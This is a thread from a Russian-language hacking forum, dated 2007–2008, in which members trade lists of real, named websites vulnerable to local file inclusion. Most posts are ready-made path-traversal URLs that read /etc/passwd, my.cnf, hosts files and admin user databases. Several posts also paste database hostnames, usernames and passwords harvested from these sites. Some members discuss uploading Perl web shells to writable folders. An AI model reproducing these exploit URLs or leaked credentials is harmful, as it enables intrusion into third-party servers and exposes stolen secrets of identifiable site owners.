PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/hosts
    http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/passwd
    http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/services
    http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/group
    http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/profile
    http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/skel/.bashrc
    
     
  2. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://photos.gavintech.com выводится оформленно, приятно читать
     
  3. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/passwd
    http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/hosts
    http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/services
    http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/syslog.conf
    http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/group
    http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/profile
    
     
  4. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.verwirrend.de/
     
  5. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    usina.com
    Code:
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/passwd
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/skel/.bashrc
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/bashrc
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/profile
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/group
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/syslog.conf
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/services
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/hosts
    http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/my.cnf
    
    
     
  6. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    bteb-bd.org
    читалкой удалось достать инфу о бд
    Code:
    $host       = "mysql229.secureserver.net";
    $dbusername = "btebonline";
    $dbpassword = "btebreg";
    $dbname     = "btebonline";
    и
    Code:
    http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/passwd
    http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/hosts
    http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/services
    http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/syslog.conf
    http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/group
    http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/profile
    http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/inputrc
    http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/bashrc
    
    ;)
     
    1 person likes this.
  7. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.bnieast.com/cgi-bin/db.pl?h=../../../../../../etc/passwd%00
     
  8. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/passwd
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/my.cnf
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/hosts
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/services
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/syslog.conf
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/group
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/profile
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/inputrc
    http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/skel/.bashrc
    
    +
    акки админов от сайта
    Code:
    http://www.clfns.com/news/file.php?file=../../data/users.db.php
     
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
    2 people like this.
  10. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.mscorecard.com/mscorecard/getfile.php?file=../../../../../../../../../../../etc/passwd
    база
    Code:
    (  $db = mysql_connect("mysql3.nebula.fi", "velocor", "2xAaQf7M") or die ("Error connecting to database."); 
      mysql_select_db("velocor", $db) or die ("Error connecting to database."); 
    )
     
    2 people like this.
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    тут вроде нет папок на запись =)
    тут папки есть, можно поробовать залить перловый шелл =\
     
    4 people like this.
  12. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    =\\

     
  13. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    82
    Likes Received:
    63
    Reputations:
    -4
    Code:
    http://www.ph3.org/fdload.php?file=../../../../../../../../../../../etc/passwd
    м база )
    Code:
    ($storeConfig['type'] = 'mysqlt';
    $storeConfig['hostname'] = 'localhost';
    $storeConfig['database'] = 'ph3org_gallery';
    $storeConfig['username'] = 'ph3org_onsec';
    $storeConfig['password'] = '4x4pajer0';
    $storeConfig['tablePrefix'] = 'g2_';
    $storeConfig['columnPrefix'] = 'g_';)
     
    1 person likes this.
  14. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    У меня эта ссылка в личке уже с ноября того года :) Сколько я не трахался с ней, так и не залил...
     
    1 person likes this.
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    я посмотрел, в той папке где лежит скрипт info.pl уже есть залитые перловые шеллы, только когда пытаешься их выполнить, вылетает service temporary unavailable
     
  16. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Code:
    http://www.usc2008.uw.edu.pl/index.php?display=../../../../../../../etc/passwd%00 
    http://www.sobral.ce.gov.br/comunicacao/novo2/index.php?pagina=cidade/index.php?pagina=/../../../../../../../../etc/passwd 
    http://warszawa.ws/?idd=/etc/passwd 
    http://www.zss.tarnow.pl/aktualnosci/full.php?plik=/etc/passwd 
    http://www.womczest.edu.pl/rodn/default.php?main=forum&sub=kwartalnik&info=roczniki&nr=200409&tr=../../../../../etc/passwd 
    https://sklep.pkn.pl/?m=help&a=topic&id=../../../../../../../../etc/passwd%00 
    http://wms.mat.agh.edu.pl/~cichacz/beczka.php?plan=../../../../../etc/passwd 
    http://www.russian-inok.org/books/nachalnik/page.php?page=../../../../../../../../etc/passwd 
    http://www.dancerzine.com/tmpl.php?page=../../../../../../../../../../../../../etc/passwd 
    http://www.zdmikp.bydgoszcz.pl/index.php?id=../../../../../../../etc/passwd%00 
    http://minipc.org/safepup/index.php?file=../../../../../../../../../../../../../../etc/passwd 
    http://www.najogada.com.br/novo/?pg=../../../../../../../../../../../../../etc/passwd%00 
    http://ruraldev.maharashtra.gov.in/marathi/dcmNew/news/popupNewsShow.php?file=../../../../../../../../../etc/passwd 
    http://www.sierrachart.com/index.php?file=../../../../../../../../../../../../../../etc/passwd 
    http://www.photoshots.pl/site/index.php?file=/etc/passwd 
    http://regalcityonline.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00 
    http://www.gerek.sk/reader.php?openfile=/etc/passwd 
    http://smarteducation.pl/demo.php?file=etc/passwd 
    http://www.crawf.com.pl/index.php?file=../../../../../etc/passwd 
    http://www.kiva.org/app.php?page=../../../../../../../../etc/passwd%00 
    http://www.linhadefrente.com.br/index.php?var=/../../../../../../../../etc/passwd 
    http://www.cieos.com/en/index.php?path=../../../../../etc/passwd 
    http://www.czerniejewo.pl/index.php?page=../../../../../../../../../../../etc/passwd 
    http://www.hndkorea.com/board.php?incfile=../../../../../etc/passwd 
    http://www.ecomstation.it/ecsoft2/index.php?language=../../../../../../../../../../../../../../etc/passwd 
    http://www.krakowglobe.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.heritagewoodland.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.oil-price.net/index.php?lang=../../../../../../../../../../../../../../etc/passwd%00 
    http://www.zaproszenia-slubne.com/printmedia/index.php?tresc=miniaturki.php&katalog=/etc/passwd 
    http://cdeam.ufam.edu.br/eficiencia/eficiencia.php?page=../../../../../../../../../etc/passwd 
    http://www.kolkovna.cz/index.php?language=../../../../../../../../../../../../../../etc/passwd%00 
    http://www.ascot.pl/index.php?lang=../../../../../../../../../../../../../../etc/passwd%00 
    http://fcs.maharashtra.gov.in/marathi/dcmNew/news/popupNewsShow.php?file=../../../../../../../../../etc/passwd 
    http://www.centrum-parkietowe.pl/_dodruku.php5?incfile=/etc/passwd 
    http://www.mitschka.eu/index.php?page=./../../../../../../../../../../../etc/passwd 
    http://www.weeblackskelf.co.uk/label/main.php?x=artists&y=../../../../../etc/passwd 
    http://galerie.superfoto.pl/static.php?static=./../../../../../../../../../etc/passwd%00&sid=MyID484b9c2fafa10 
    http://www.thelinkpage.co.uk/index.php?f=/../../../../../../../etc/passwd 
    http://papier.sklep.pl/_dodruku.php?incfile=/etc/passwd 
    http://www.hcc.vic.edu.au/templates/content.php?incfile=./../../../../../../../../../etc/passwd 
    http://romek.intermania.pl/pasieka24/_dodruku.php?incfile=/etc/passwd 
    http://www.diabetes-india.com/template1.php?incfile=./../../../../../../../../../etc/passwd 
    http://centrumvolvo.pl/pl/stronka.php?id=/etc/passwd 
    http://www.accessampn.com/cgi-bin/AMPNtemplate.cgi?incfile=./../../../../../../../../../etc/passwd 
    http://www.ksiazkiknk.pl/index.php?site=/etc/passwd 
    http://www.hlyb.net/board.html?incfile=./../../../../../../../../../../../../etc/passwd 
    http://www.kettlefoods.co.uk/site/HomePage.do?id=./../../../../../../../../../../etc/passwd 
    http://www.seeyou.co.jp/pets/subpage.php?incfile=./../../../../../../../../../etc/passwd 
    http://www.rachelpopowcer.com/main.php?x=../../../etc/passwd 
    http://2edo.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd 
    http://www.softworld.pl/mp3/?download=../../../../../../../etc/passwd 
    http://www.studiosupra.pl/index.php?str=cokolwiek 
    http://www.kusat.com/go.php?path=/../../../../../../etc/passwd 
    http://www.magicalexperience.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.guitaremporium.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.interspeech2005.org/technical//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.fluxplay.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.thewinedetective.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.tugofwar.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.hljbsm.gov.cn//index.jsp?id=../../../../../../../../../../etc/passwd 
    http://www.vortex.org.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.lyson.com.pl/empty.php?incfile=/etc/passwd 
    http://www.omnet.com/main.jsp?splsh=4&incfile=../etc/passwd 
    http://www.artel.agdex.com/index.php?open=/etc/passwd 
    http://www.fanello.ch/index.php?page=./../../../../../../../../../../../etc/passwd 
    http://www.cimav.edu.mx/oferta.php?load=../../../../../etc/passwd 
    http://www.waszewesele.pl/index2.php?tresc=/../../../etc/passwd 
    http://www.artel.agdex.com/index.php?open=/etc/passwd 
    http://psychotronika.info/open.php?page=../../../../../../../etc/passwd 
    http://www.crawf.com.pl/index.php?file=/etc/passwd 
    http://www.allprof.com.pl/beautyimage/index.php?content=../../../../../../../../etc/passwd&id=44 
    http://www.rennsportnews.de/index.php?load=/etc/passwd 
    http://www.dogs-abc.de/index.php?filename=/etc/passwd 
    http://www.piedmontsoccer.org/inde.php?cont=/etc/passwd 
    http://www.zaproszenia.com/slub/main.php?link=LFI 
    http://www.rennsportnews.de/index.php?load=/etc/passwd 
    http://www.belchatow.sr.gov.pl/index.php?id=[LFI] 
    http://www.santaclauslive.com/main.php?link=LOCAL_FILE_INCLUDE&pid=2&kieli=eng 
    http://www.riversideeurope.com/lang_p/index.php?page=[LFI] 
    http://www.fox-foto.com/index.php?strona=../../../../../../../etc/passwd 
    http://www.reverie.dreamhost.com/index.php?file_name[]=/etc/passwd 
    http://uplynnienia.eu/index.php?id=/etc/passwd 
    http://www.opussoft.com.pl/?f=/etc/passwd 
    http://www.andrewsmithresearch.co.uk//index.php?f=../../../../../../../../../../etc/passwd 
    http://www.egir.dk/index.php?page=/etc/passwd 
    http://www.ekonto.net.pl/?id=[local%20include] 
    http://www.oepu.at/cms/cms/index.php?page=./../../../../../../../../../../../etc/passwd 
    http://programy.ilife.pl/index.php?download=/etc/passwd 
    http://www.ranking.pl/index.php?page=AnalizyPage&zone=3&stat=zmiana_metody08&p=/../../../../../../etc/passwd%00 
    http://www.saladillo.gov.ar/index.php?include=admin/.passwd 
     
    3 people like this.
  17. n3m0

    n3m0 Elder - Старейшина

    Joined:
    11 May 2007
    Messages:
    133
    Likes Received:
    92
    Reputations:
    11
    :)
     
    2 people like this.
  18. August12

    August12 Member

    Joined:
    11 Nov 2007
    Messages:
    4
    Likes Received:
    7
    Reputations:
    1
    Serbia


    Russia

     
    #718 August12, 17 Jun 2008
    Last edited: 17 Jun 2008
    3 people like this.
  19. Fluxoid

    Fluxoid New Member

    Joined:
    12 Jun 2008
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.allsidige.no/elementer.php?file=[INCLUDE]
    http://www.cdb.com.kh/index.php?url=[INCLUDE]
    http://www.elma.se/index.php?url=[INCLUDE]
    http://www.pqfilm.ru/head.php?id=23&file=[INCLUDE]
    
     
    #719 Fluxoid, 17 Jun 2008
    Last edited: 18 Jun 2008
    1 person likes this.
  20. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    _http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f=../